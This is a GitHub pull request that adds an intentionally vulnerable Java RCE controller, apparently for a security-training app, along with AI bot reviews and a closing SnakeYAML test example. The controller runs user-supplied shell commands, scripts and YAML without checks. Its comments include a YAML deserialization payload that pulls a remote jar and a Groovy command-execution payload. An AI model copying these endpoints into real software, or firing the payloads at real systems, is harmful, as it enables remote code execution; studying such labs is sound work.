add Rce.java test qodo#8

Open
cccfeng wants to merge 1 commit into
masterfrom
feat33
Conversation

@cccfeng

@cccfeng cccfeng commented Apr 28, 2025

Owner

No description provided.

@cccfeng

cccfeng commented Apr 28, 2025

Owner Author

@CodeRabbit pause

@coderabbitai

coderabbitai Bot commented Apr 28, 2025

✅ Actions performed

Reviews paused.

Repository owner deleted a comment from coderabbitai Bot Apr 28, 2025
@cccfeng

cccfeng commented Apr 28, 2025

Owner Author

@CodiumAI-Agent /describe

Repository owner deleted a comment from sonarqubecloud Bot Apr 28, 2025
@QodoAI-Agent


Title

add Rce.java test qodo


PR Type

Enhancement


Description

  • New RCE REST controller with multiple exec endpoints

  • Command execution via Runtime and ProcessBuilder

  • Script evaluation: JS, YAML (unsafe/safe), Groovy

  • Demo main method for command touch


Changes walkthrough 📝

Relevant files:

Enhancement
  Rce2.java: Introduce RCE controller with various exec endpoints
  src/main/java/org/joychou/controller/Rce2.java (+138/-0)
    • Introduce Rce controller class in org.joychou.controller
    • Add /runtime/exec and /ProcessBuilder command exec endpoints
    • Implement /jscmd, /vuln/yarm, /sec/yarm, /groovy script eval endpoints
    • Include main method demo for runtime exec

Need help?
  • Type /help how to ... in the comments thread for any questions about PR-Agent usage.
  • Check out the documentation for more information.
@cccfeng

cccfeng commented Apr 28, 2025

Owner Author

@CodiumAI-Agent /review

@QodoAI-Agent

PR Reviewer Guide 🔍

Here are some key observations to aid the review process:

⏱️ Estimated effort to review: 2 🔵🔵⚪⚪⚪
🧪 No relevant tests
🔒 Security concerns

Remote Code Execution:
Multiple endpoints directly execute user-supplied content (shell commands, JavaScript, Groovy, YAML payloads) without any input validation or sandboxing, introducing severe RCE vulnerabilities.

⚡ Recommended focus areas for review

Unrestricted Command Execution

Endpoints CommandExec and processBuilder execute arbitrary shell commands from user input without validation or sanitization, allowing full RCE.

    @GetMapping("/runtime/exec")
    public String CommandExec(String cmd) {
        Runtime run = Runtime.getRuntime();
        StringBuilder sb = new StringBuilder();
    
        try {
            Process p = run.exec(cmd);
            BufferedInputStream in = new BufferedInputStream(p.getInputStream());
            BufferedReader inBr = new BufferedReader(new InputStreamReader(in));
            String tmpStr;
    
            while ((tmpStr = inBr.readLine()) != null) {
                sb.append(tmpStr);
            }
    
            if (p.waitFor() != 0) {
                if (p.exitValue() == 1)
                    return "Command exec failed!!";
            }
    
            inBr.close();
            in.close();
        } catch (Exception e) {
            return e.toString();
        }
        return sb.toString();
    }

Insecure YAML Deserialization

The yarm endpoint uses SnakeYAML's default loader to parse untrusted YAML content, exposing the application to deserialization attacks.

    @GetMapping("/vuln/yarm")
    public void yarm(String content) {
        Yaml y = new Yaml();
        y.load(content);
    }

Dynamic Script Evaluation

Endpoints jscmd and groovyshell load and execute remote scripts via Nashorn and GroovyShell without sandboxing, enabling arbitrary code execution.

    @GetMapping("/jscmd")
    public void jsEngine(String jsurl) throws Exception{
        // js nashorn javascript ecmascript
        ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
        Bindings bindings = engine.getBindings(ScriptContext.ENGINE_SCOPE);
        String cmd = String.format("load(\"%s\")", jsurl);
        engine.eval(cmd, bindings);
    }
    
    
    /**
     * http://localhost:8080/rce/vuln/yarm?content=!!javax.script.ScriptEngineManager%20[!!java.net.URLClassLoader%20[[!!java.net.URL%20[%22http://test.joychou.org:8086/yaml-payload.jar%22]]]]
     * yaml-payload.jar: https://github.com/artsploit/yaml-payload
     *
     * @param content payloads
     */
    @GetMapping("/vuln/yarm")
    public void yarm(String content) {
        Yaml y = new Yaml();
        y.load(content);
    }
    
    @GetMapping("/sec/yarm")
    public void secYarm(String content) {
        Yaml y = new Yaml(new SafeConstructor());
        y.load(content);
    }
    
    /**
     * http://localhost:8080/rce/groovy?content="open -a Calculator".execute()
     * @param content groovy shell
     */
    @GetMapping("groovy")
    public void groovyshell(String content) {
        GroovyShell groovyShell = new GroovyShell();
        groovyShell.evaluate(content);
    }
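Added here as a reviewer's check, not code from the PR or the repository under review: a standalone class that pins down the difference the review draws between the default loader behind /vuln/yarm and the SafeConstructor loader behind /sec/yarm. It assumes SnakeYAML 1.x (the no-arg SafeConstructor() the PR calls); the class name YamlLoaderCheck and both YAML strings are constructed for this example.

```java
// Added example, not part of the PR. Assumes SnakeYAML 1.x on the classpath.
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class YamlLoaderCheck {

    // Constructed input: a document carrying a global (!!) type tag, which is the
    // mechanism the review flags for /vuln/yarm (the tag names a Java class).
    static final String TAGGED = "!!java.net.URL [\"http://example.invalid/\"]";

    // Constructed input: plain data with no tags, which a safe loader must still accept.
    static final String PLAIN = "name: demo\nports: [80, 443]\n";

    /** Same construction as /sec/yarm: only standard YAML types are built. */
    static Object loadSafe(String content) {
        return new Yaml(new SafeConstructor()).load(content);
    }

    /** Same construction as /vuln/yarm: !! tags resolve to classpath classes. */
    static Object loadDefault(String content) {
        return new Yaml().load(content);
    }

    /** True when the SafeConstructor loader refuses the document. */
    static boolean safeLoaderRejects(String content) {
        try {
            loadSafe(content);
            return false;
        } catch (YAMLException e) {
            // SafeConstructor has no constructor registered for a java.* tag and
            // throws ConstructorException ("could not determine a constructor for the tag ...").
            return true;
        }
    }

    public static void main(String[] args) {
        // The two properties a regression test for /sec/yarm should assert:
        System.out.println("safe loader rejects tagged input: " + safeLoaderRejects(TAGGED));
        System.out.println("safe loader accepts plain input:  " + !safeLoaderRejects(PLAIN));
        // The default loader instantiates whatever class the tag names; printing the
        // resulting class shows why /vuln/yarm must never receive untrusted content.
        System.out.println("default loader built: " + loadDefault(TAGGED).getClass().getName());
    }
}
```

Turning the two boolean checks into unit tests would also address the "No relevant tests" finding above for the /sec/yarm endpoint.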
